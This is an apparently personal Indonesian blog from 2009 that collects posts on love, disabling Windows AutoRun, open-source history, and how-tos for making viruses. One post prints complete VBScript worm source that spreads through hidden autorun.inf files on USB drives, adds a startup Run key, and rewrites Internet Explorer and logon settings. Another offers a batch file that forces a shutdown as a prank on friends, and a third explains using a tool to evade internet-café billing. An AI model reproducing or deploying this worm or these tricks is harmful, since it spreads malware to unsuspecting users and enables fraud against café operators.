Sabtu, 26 Desember 2009




Cinta itu indah karma ia bekerjadamlam ruang kehidupan yang luas, dan inti pekerjaannya adalah memberi apa saja yang diperlukan oleh orang-orang yang kita cintai untuk tumbuh menjadi lebih baik dan berbahagia karenanya.

Para pecinta sejati hanya mengenal satu pekerjaan besar dalam hidup mereka :\memberi, terus memberi .dan selamanya begitu , menerima? Mungkin , atau juga bias pasti! Tapi itu efek , hanya efek . efek dari apa yang mereka berikan . seperti cermin kebijakan yang memantulkan kebijakan yang sama. Sebab, adalah hakikat dia alam kebajikan bahwa setiap satu kebajikan yang kita lakukan selalu mengajak saudara –saudara kebijakan yang lain untuk dilakukan juga.

Itu juga yang membedakan para pecinta sejati dengan para pecinta palsu , kalau kamu mencintai seseorang dengan tulus, ukuran ketulusan dan kesejatian cinta mu adalah apa yang kamu berikan padanya untuk membuat kehidupan lebih baik . maka kamu adalah air , maka kamu adalah matahari , ia tumbuh dan berkembang dari siraman airmu . ia besar dan berubah dari sinar cahayamu .


Para pecinta sejati tidak suka berjanji. tapi begitu mereka memutuskan mencintai seseorang , mereka segera menbuat rencana memberi .setelah itu mereka bekerja dalam diam dan sunyi untuk mewujudkan rencana mereka . setiap satu rencana memberi terealisasi, setiap itu bibit cinta muncul bersemi dalam hati orang yang dicintai. janji menerbitkan harapan . tapi pemberian melahirkan kepercayaan.

Bukan hanya itu . rencana memberi yang terus terealisasi menciptakan ketergantungan . seperti pohon tegantung dari siraman air dan matahari . itu ketergantungan produktif. Ketergantunga yang menghidupkan . digaris hakikat ini . cinta adalah cerita tentang seni menghidupkan hidup. Mereka menciptakan kehidupan bagi orang –orang hidup . karena itu kehidupan yang mereka bangun seringkali tidak di sadari oleh orang-orangyang menikmatinya .tapi begitu sang pemberi pergi , mereka segera merasakan kehilanga yang menyayat hati . tiba tiba ada ruang besar yang kosong tak brpenghuni . tiba tiba ada kehidupan yang hilang .

Barangkali suatu saat kamu tergoda untuk menguji dirimu sendiri. Apakah kamu adalah seorang pcinta sejati atau pecinta palsu . caranya sederhana simak dulu pesan umar bin khattab ini:

“Hanya ada dari dua perasaan yang mungkin dirasakan oleh setiap orang pada saat pasangan hidup nya wafat : merka merasa bebas dari beban atau merasa kehilangan tempat bergantung” .

Sekarang bertanya lah pada pasangan hidup anda tanpa dia ketahui : “jika aku mati sekarang , apakah kamu akan merasa bebas dari sebuah beban atau akan merasakan tempat bergantung ?” kalau dia merasa kehilangan , maka dilangit hatinya akan ada mendungpekat yang mungkin menurunkan hujan air mata yang sangat deras . jika tidak munkin senyumnya mereka sambil berharap bahwa kepergian mu akan memberikan ia kesempatan baru untuk membangun kehidudapan yang lebih baik .

Jumat, 25 Desember 2009



Banyak Orang yang belum mengerti benar betapa besarnya kemungkinan terkena virus melalui autorun.inf. Pada mulanya Microsoft membuat fungsi autorun untuk fungsi kemudahan. Teatapi lama – kelamaan celah atau fungsi ini dimanfaatkan para pembuat virus. Dengan fungsi ini virus akan segera menyebar ketika sebua device di hubungkan ke pc atau laptop kita.

Kali ini saya akan dibahas sedikit lebih dalam mengenai Autorun.inf, semoga yang sudah tahu semakin tahu dan yang belum tahu mulai sedikit paham tentang autorun.inf, baik struktur yang ada didalamnya, manfaat, bahaya dan cara mematikan autorun.inf.

Autorun atau autoplay merupakan fasilitas di sistem operasi yang berfungsi menjalankan
file secara otomatis ketika media seperti CD-ROM, DVD-ROM, Flash disk dan lainnya di masukkan/pasang di komputer. Sehingga ketika berbagai media tersebut dimasukkan, tanpa kita menjalankan apapun, ada program yang akan otomatis berjalan sendiri. Fitur ini biasa dimanfaatkan dalam CD Driver yang disertakan ketika membeli motherboard / VGA. Tetapi saat ini tidak dipungkiri malah dimanfaatkan sebagai media penyebar virus, terutama melalui flashdisk. Apalagi dengan penggunaan flashdisk yang sudah seperti jamur di musim hujan..

Sedangkan file Autorun.inf sendiri merupakan file yang berisi instruksi tertentu, tentang apa yang otomatis dijalankan ketika media seperti flashdisk/CD dimasukkan ke komputer. Instruksi ini dapat berupa perintah untuk menjalankan file exe.


STRUKTUR AUTORUN.INF
Autorun.inf hanya berupa text file biasa dan bisa dibuka dengan text editor seperti notepad. Ada baris-baris kode yang umum dijumpai didalamnya. Sebenarnya ada beberapa bagian (Key) yang bisa ditulis di autorun,
yaitu
[Autorun],
[Content],
[ExclusiveContentPaths],
[IgnoreContentPaths],
dan [DeviceInstall].





Disini hanya akan dibahas beberapa struktur [Autorun] saja, karena memang ini yang sering kita lihat ( selengkapnya bisa di baca disini )
Open

Perintah ini akan otomatis menjalankan file exe yang ada.

Misalnya sebagai berikut
Open=setup.exe ( akan menjalankan file setup.exe yang berada satu direktory dengan autorun /root direktory)
Open=virus\inivirus.exe (akan menjalankan file inivius.exe yang ada di folder virus)
action
Untuk menampilkan nama/pesan ketika muncul Autoplay dialog.
shellexecute
Hampir sama dengan perintah Open, tetapi bisa juga untuk selain file exe, termasuk link website dan bisa ditambah dengan parameter sesudah nama file. Contoh :
shellexecute=http://ebsoft.web.id
action=Kunjungi ebsoft.web.id

icon
Untuk memberi icon di media yang dipakai (yang berisi autorun.inf). Bisa menggunakan file .ico, .exe .dll maupun .bmp. Contohnya :
icon=MyProg.exe,1
icon=myicon.ico
label

untuk memberi label (nama) pada media yang digunakan (nama drive CD-ROM atau flashdisk yang berisi autorun.inf tersebut.
label=Flashdisk Hebat

shell
Untuk menampilkan menu ketika klik kanan drive yang bersangkutan. Misalnya contoh berikut :
shell\menu baru=buka file contoh
shell\menu-baru\command=notepad "file-contoh.txt"
shell=menu baru
dengan kode diatas, maka ketika kita klik kanan drive-nya akan muncul menu “buka file contoh”. jika baris pertama dihilangkan maka menunya “menu baru”. dan ketika menu tersebut di klik akan dijalankan notepad dengan membuka file “file-contoh.txt”. Jadi ketika baris kode tersebut saling berhubungan. Jika baris 1 da 3 sama-sama digunakan maka baris 3 akan diabaikan.

Selanjutnya ketika fasilitas Autorun di hilangkan / di non aktifkan, maka program di open dan shellexecute tidak akan berjalan secara otomatis. Tetapi label, icon dan menu klik kanan tetap akan tampil. Agar lebih aman, maka kita bisa me-nonaktifkan fasilitas Autorun ini. bagaimana caranya ? Berikut penjelasannya :
Berbagai cara Me-nonaktifkan fasilitas Autorun di Windows
• Menekan dan menahan tombol Shift ketika kita memasang/memasukkan Flashdisk/CD-ROM ( tidak berjalan di windows Vista).
• Me-nonaktifkan melalui Registry
• Memanfaatkan fasilitas gpedit.msc

Me-nonaktifkan Autorun melalui Registry
1. Buka Registry Editor, Start Menu > Run, ketikkan Regedit
2. Buka Key berikut : HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
3. Jika ada Key NoDriveTypeAutoRun, maka double klik dan isi nilainya dengan salah satu nilai berikut :
Decimal Hexadecimal Efek yang dihasilkan
181 b5 Autorun tidak berjalan sama ekali untuk semua media
149 95 Autorun hanya aktif untuk CD-ROM / DVD-ROM
177 b1 Autorun hanya aktif untuk flash drive (flashdisk dan sejenisnya)
145 91 Autorun aktif untuk semua media
4. Jika Key NoDriveTypeAutoRun tidak ada maka buak dengan cara klik kanan, pilih New > Binary Value. Kemudian beri nama NoDriveTypeAutoRun, dan isi nilainya ( double klik) dengan nilai diatas.
5. Langkah diatas hanya berefek di User yang bersangkutan. Agar berefek di semua pengguna komputer, lakukan hal yang sama untuk Key : HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\
Jika masih menggunakan Win 9x/ME maka caranya sedikit berbeda. Selengkapnya bisa dibaca artikel disini. Lebih jauh tentang caranya bisa dibaca juga artikel berikut : Mencegah virus menular melalui Flashdisk
Memanfaatkan fasilitas gpedit.msc

Ini bisa dilakukan untuk pengguna Windows 2000, Server 2003 dan Windows XP Professional, langkah-langkahnya sebagai berikut :
1. Dari Start Menu > Run, ketikkan gpedit.msc lalu klik OK.
2. Pilih Computer Configuration > Administrative Template dan klik System
3. Di panel Settings, klik kanan Turn off Autoplay dan klik Properties ( di windows 2000, namanya Disable Autoplay)
4. Klik Enabled kemudian pilih All drives di box Turn off Autoplay untuk
mematikan fasilitas autorun di semua drive.
5. Klik OK, dan tutup window dialog tersebut.
6. Restart Komputer.

Untuk Pengguna Windows Vista, caranya sebagai berikut :
1. Dari Start Menu ketikkan Gpedit.msc di box Start Search lalu tekan enter ( mungkin akan di tampilkan perintah untuk memasukkan password administrator)
2. Di bagian Computer Configuration pilih Administrative Templates lalu pilih lagi Windows Components klik Autoplay Policies
3. Di panel Details, double klik Turn off Autoplay
4. Klik Enabled dan pilih All drives di box Turn off Autoplay untuk me-nonaktifkan Autorun di semua drive.
5. Restart Komputer.

Jika cara diatas tidak berhasil menon aktfkan autorun, maka kemungkinan perlu download update sesuai dengan versi windows yang digunakan. Detailnya sebagai berikut :
• Windows XP SP2 dan SP3 (KB950582)
• Windows Server 2003 Itanium-based Systems (KB950582)
• Windows Server 2003 x64 Edition (KB950582)
• Windows Server 2003 (KB950582)
• Windows XP x64 Edition (KB950582)
• Windows 2000 (KB950582)


semoga berhasil :)
lagi-lagi si virus beraksi lagi neh, skrng gw mau bagiin ilmu gw yang lain neh, yitu cara membuat virus autorun.
ikuti langkah-langkah berikut ini:


cara membuat virus autorun;
1. script coding pertama
[autorun]shellexecute=wscript.exe k4l0n6.sys.vbs
simpan coding tersebut dengan nama dan ekstensi file “autorun.inf” (tanpa tanda petik)

2. script coding kedua‘Kalong-X2‘Varian dari Kalong.VBSon error resume next
‘Dim kata-kata berikutdim rekur,syspath,windowpath,desades,longka,mf,isi,tf, kalong,nt,check,sd

’siapkan isi autorun isi = “[autorun]” & vbcrlf & “shellexecute=wscript.exe k4l0n6.sys.vbs”set longka = createobject(”Scripting.FileSystemObject”)set mf = longka.getfile(Wscript.ScriptFullname)dim text,sizesize = mf.sizecheck = mf.drive.drivetypeset text = mf.openastextstream(1,-2)do while not text.atendofstreamrekur = rekur & text.readlinerekur = rekur & vbcrlfloopdo

‘buat file induk
Set windowpath = longka.getspecialfolder(0)Set syspath = longka.getspecialfolder(1)set tf = longka.getfile(syspath & “\recycle.vbs”)tf.attributes = 32set tf = longka.createtextfile(syspath & “\recycle.vbs”,2,true)tf.write rekurtf.closeset tf = longka.getfile(syspath & “\recycle.vbs”)tf.attributes = 39

’sebar ke removable disc ditambahkan dengan Autorun.inf
for each desades in longka.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> “A:” then
set tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)tf.attributes =32set tf=longka.createtextfile(desades.path &”\k4l0n6.sys.vbs”,2,true)tf.write rekurtf.closeset tf=longka.getfile(desades.path &”\k4l0n6.sys.vbs”)tf.attributes = 39
set tf =longka.getfile(desades.path &”\autorun.inf”)tf.attributes = 32set tf=longka.createtextfile(desades.path &”\autorun.inf”,2,true)tf.write isitf.closeset tf = longka.getfile(desades.path &”\autorun.inf”)tf.attributes=39end ifnext

‘Manipulasi Registry
set kalong = createobject(”WScript.Shell”)
‘Ubah IE Titlekalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”:: X2 ATTACK ::”
‘Ubah tulisan pertama pada text box menu RUNkalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\RunMRU\a”, “KALONG-X2/1?kalong.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Explorer\RunMRU\MRUList”, “a”

‘Buat pesan saat Windows Startupkalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeCaption”, “KALONG-X2?kalong.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Winlogon\LegalNoticeText”, “Komputer Anda Diambil Alih”

‘Aktifkan saat Windows Startup
kalong.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur rentVersion\Run\Ageia”, syspath & “\recycle.vbs”
‘Ubah Default Start Page Internet Explorerkalong.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page”, “http://www.vaksin.com”

‘Bonus
if check <> 1 thenWscript.sleep 200000end ifloop while check <> 1set sd = createobject(”Wscript.shell”)sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname

simpan coding tersebut dengan nama dan ekstensi file “k4l0n6.sys.vbs” (tanpa tanda petik)

secara otomatis virus tersebut akan menyebar melalui flashdisk dan menginfeksi komputer yang kita gunakan. Untuk mengetahui komputer terkena virus autorun dapat menggunakan software iKnowPS sehingga akan terlihat frekuensi tampilan kerja komputer yang terlihat sangat sibuk.








Adapun cara menanggulangi virus tersebut yaitu dengan cara
- tekan menu Tools > Folder Options… > View > unchek Hide Protected operating system files (Recommended) > yes > OK
- sehingga secara otomatis akan terlihat tampilan file virus yang terhidden tersebut
- langkah selanjutnya yaitu dengan cara membuka dan mempelajari script coding file virus tersebut. Dan mempelajari bagian-bagian mana saja yang settingannya dirubah, terutama pada register editor (menu run > ketik regedit > OK)
- setelah itu, file tersebut dihapus/di delete dari komputer.

Rabu, 23 Desember 2009


mmmzzz....
waw.. judulnya seremmmm...
ada banyak cara untuk mencurangi biling, gw cuma mau gasih tau salah satu caranya, yaitu dengan menggunakan zhider, zhider adalah sebuah aplikasi untuk menghilangkan login screen pada biling.
mau tau ....?
ikuti langkah-langkah berikut ini:
  1. download zhider yang berbayar ataupun yang gratis, untuk yang gratis anda bisa mendapatkan nya disini.
  2. ekstrak file tersebut
  3. jalankan file tersbut,
  4. dan buka file tersbut

untuk menghilangkan login sreen pada biling tekan ctrl+alt+z , dan untuk mengembalikan seperti semula tekan ctrl+alt+x.




catatan: aplikasi ini hanya untuk membuka, tidak untuk
menjebol biling.






salam manis...

0246 krw

Jumat, 18 Desember 2009

hai3x,,, guys.... buka nya gw hacker/craker neh...
melihat judul diatas pasti nyangkanya gw hacker/craker ya....
he2x..
gw mau ngasih sedikit ilmu gw, yaitu cara membuat virus ,
yng pasti gw gak mau bertanggung jawab kalau terjadi apa-apa..
okelah kalau begitu....
kita mulai.. ikuti lahgkah-langkah dibawah ini:

  • petama-tama sediain dulu notepad nya..
  • copy kode dibawah ini dan paste ke dalam notepad , berikut ini kodenya:





cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…
echo …………………
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo NEXT…………!
echo:
echo:
echo HALO SOBAT
echo MAU JADI TEMAN AKU ??
echo:
echo:
echo IM DARKO SI PENGHANCUR...
start /w wscript.exe C:\sleep2000.vbs
echo …………
start /w wscript.exe C:\sleep4000.vbs
echo …………
echo NTAR…….!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN…
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir Si_INDO_CRACKER
start /w wscript.exe C:\sleep3000.vbs
echo:
echo:
echo:
echo:
echo HAPPY BIRTHDAY
echo KOMPUTER KAMU BAGUS DEH
echo BOLEH Q INTIP DIKIT
echo HMM BOLEH JUGA NEH ISINYA
echo CALL ME YACHH +6284323xxxxxx GPRS JUGA BOLEH KOK
echo:
echo:
echo:
echo:
echo:
echo SABARAN BRO…
start /w wscript.exe C:\sleep3000.vbs
echo ………..
echo zzzzzzz….
echo:
echo:
start /w wscript.exe C:\sleep3000.vbs
echo OKE….Virus AKTIF!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo FIREWALL KAMU ANCUR…
start /w wscript.exe C:\sleep2000.vbs
echo SEMUA PROSESS UDAH DIBANTAI…
start /w wscript.exe C:\sleep2000.vbs
echo VIRUS SILAHKAN BOOTING DENGAN SEGALA HORMAT…
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo VIRUS MASUK PODIUM AKHIR!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo I LOVE U FULL
echo HA HA HA HA
echo:
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c “BERTAUBATLAH, BACK TO UR GOD MOHON MAAF LAHIR DAN BATIN.”









  • save kode berikut , dengan nama terserah anda, tapi harus berakhiran .bat
    contoh: polokpok.bat
  • pilih all files di kolom type a files
  • kemudian save
  • selesai



sebenarnya virus ini pnya tmen gw,, tapi gw udah modifikasi supaya tidak berbahaya....cuma menakut-nakuti he2x...
efek virus ini hanya menshutdown pc saja , so, jngan kwatir ya...
virus ini pas bnget buat loe yang suka ngejailin tmen, (jadi inget masa lalu.. he2x)..




salam manis
darko mania.......................................0246

Minggu, 18 Oktober 2009

Apa itu open source??

Dari judul diatas kita bisa tebak apa tema kita kali ini yaitu mengenal sistem operasi yang berbasis open source,

Open source berasal dari kata open yang artinya terbuka dan source yang artinya sumber,atau yang lebih lenkapnya lagi, open source adalah sistem operasi yang bersifat free software, dan membuka source kodenya untuk di pelajari oleh orang lain setelah itu dikembangkan dan selanjutnya di sebarluaskan

Banyak orang kurang akrab dengan istilah ini , mungkin kata open source kurang popular dikalangan user internet .

Sejarah open source

Sejarah open source di mulai dari bermunculannya hacker-hacker di universitas- universitas amerika,para hacker membentuk komunitas-komunitas kecil tapi sangat erat hubungan nya dengan antar komunitas , mereka bias bertukar kode program, dan tiap komunitas/orang memodifikasinya , hasil modifikasi nya jg mereka sebar kan ke komunitas-komunitas lain.

RICHARD STALLMAN , yang kini di sebut bapak open source , adalah pelopor perkembangan di masa itu , ia jg tergabung dalam komunitas MIT.

Awal tahun 1980 komunitas hacker di MIT bubar karna itula Richard Stallman keluar dari MIT..

RICHARD STALLMAN

Pada tahun 1985 richard Stallman mendirikan organisasi yang bernama free software foundation(fsf).tujuan dari organisasi ini adalah untuk memgembangkan sistim operasi . akan tetapi richard Stallmanhinga saat ini belum bisa mengembangkan suatu kernel, yang menjadi tujuan utamanya, factor penyebab kegagalan nya ,sistem operasi tersebut dikembangkan oleh sekelompok komunitas kecil dan tidak melibat kan komunitas yang lebih luas dalam pengembangan nya.

Pada tahun 1991 LINUS TORVALDS, seorang mahasiswa S2 finlandia, berhasil mengembangkan sistim operasi yang bertipe unix yang disebut.LINUX.

LINUS TORVALDS

Linux merupakan salah satu contoh hasil pengembangan perangkat lunak bebas dan sumbr terbuka utama,kode sumber linux dapat di modifikasi , digunakan dan di stribusikan kembali secara bebas oleh siapa pun .peralatan system dan pustakanya umum nya berasal dari sistem operasi GNU , yang di umumkan oleh Richard Stallman pada tahun 1983 , kontribusi GNU adlah dasar dari nama alternative GNU/LINUX.

Seiring dengan meningkatnya kebutuhan peranti lunak dan semakin stabilnya rilis dari distri busi linux meningkat kan minat user terhadap piranti lunak yang bebas . kondisi ini mendorong munculnya nama open source,pada tahun 1998, yang juga ikut mendorong suatu organisasi nirlaba yaitu OSI ( Open source initiative).

Keberadaan open source sangat erat sekali dengan internet, para pengembang software ini tersebar di seluruh penjuru dunia dan berinteraksi melalui internet.

Pertama-tama pengembang ini mengambil software dari internet, selanjutnya mereka memprbaiki kelemahan-kelemahan pada software , setelah itu mereka menyebarluaskan nya lagi melalui internet.maka banya k bermunculan software yang bersifat free software , free software adalah software yang dapat di gunakan tanpa membayar lisensi(hak cipta) karma di kembang kan dengan cara open source.

Sekarang ini banyak sekali software yang berbasis open source , diantara nya yang paling trkenal adalah linux , linux mempunya fitur yang belum ada pada sistim operasi lainya , yaitu menjalankan sistem operasi dan aplikasi tanpa menginstalnya di harddisk , cukup dengan menjalankan live cd .

Linux mempunyai distro live cd , didalam cd ini sudah terinstal/terpasang paket-paket yang kita jumpai di linux besar yaitu,open office , GIMP, KOOFICE , dsb.

berkat kemampuan it linux menjadi sangat di gemari oleh kalangan user , kita dapat menggunakan linux di computer orang lain , tanpa harus menginstal di harddisk . akan tetapi ke praktisan ini ada batas nya , di karnakan kecepatan di komputert mengakses CD-ROM jauh klebih lambat di bandingkan dengan mengakses harddisk, dan memori di dalam live cd hanya 700 MB.

Dari penjabaran dia atas , mungkin sekarang kalian sudah tahu dasar dari open source,mudaha-mudahan dari artikel ini kalian bersemangat untuk mendalami lebih jauh lagi tentang open source.

Popular Posts